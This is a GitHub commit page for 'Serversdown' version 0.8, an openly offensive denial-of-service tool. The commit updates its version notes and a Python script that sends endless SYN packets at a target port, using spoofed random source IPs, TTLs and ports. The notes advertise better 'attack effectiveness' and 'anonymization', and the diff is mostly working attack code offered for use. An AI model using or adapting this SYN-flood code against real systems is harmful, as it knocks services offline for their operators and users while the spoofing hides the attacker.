Skip to content

Commit

Permalink
VERSION 0.8
Browse files Browse the repository at this point in the history
OUT NOWWWW
  • Loading branch information
Hacker5preme committed Sep 30, 2019
1 parent 20f44ee commit b97716f
Show file tree
Hide file tree
Showing 2 changed files with 16 additions and 12 deletions.
10 changes: 6 additions & 4 deletions Serversdown/Versionnotes.txt
Original file line number Diff line number Diff line change
@@ -1,11 +1,13 @@
Version Notes:
- Version 0.7
- Version 0.8
- Supported Options of Serversdown:
-> Syn Flood
- Supported Options of Syn Flood:
-> Fully supporting anonymization
-> Attack still only over one targetport
- Added Features on this version:
-> Changed python enviroment to pypy
-> Increased speed by implementing multiprocessing
-> Small bug fixes
-> Massive improvance of attack effictiveness by changing socket behaviour while attack
-> Changed anonymiyation selection system
-> More user friendly


18 changes: 10 additions & 8 deletions Serversdown/definepacket_synflood.py
Original file line number Diff line number Diff line change
Expand Up @@ -13,16 +13,18 @@ def sendpacket(Ip_range, destination, targetport):
silva.send(bytes(IP(dst = str(destination), src = str(Ip_range), ttl=int(random.randint(80, 254)))/TCP(dport = int(targetport), sport = int(random.randint(1024, 65535)), flags = "S")))
print 'Package sent'
except:
silva.shutdown(socket.SHUT_RDWR)
silva.close()
silva = socket.socket(socket.AF_INet, socket.SOCK_STREAM)
silva = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
silva.connect((destination, targetport))

else:
while 0 == 0:
sourceIP = random.choice(Ip_range)
print 'Selected'
silva.send(bytes(IP(dst = str(destination), src = str(sourceIP), ttl=int(random.randint(80, 254)))/TCP(dport = int(targetport), sport = int(random.randint(1024, 65535)), flags = "S")))
Ip_range.remove(sourceIP)
print 'package sent'

try:
sourceIP = random.choice(Ip_range)
silva.send(bytes(IP(dst = str(destination), src = str(sourceIP), ttl=int(random.randint(80, 254)))/TCP(dport = int(targetport), sport = int(random.randint(1024, 65535)), flags = "S")))
Ip_range.remove(sourceIP)
print 'package sent'
except:
silva.close()
silva = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
silva.connect((destination, targetport))

0 comments on commit b97716f

Please sign in to comment.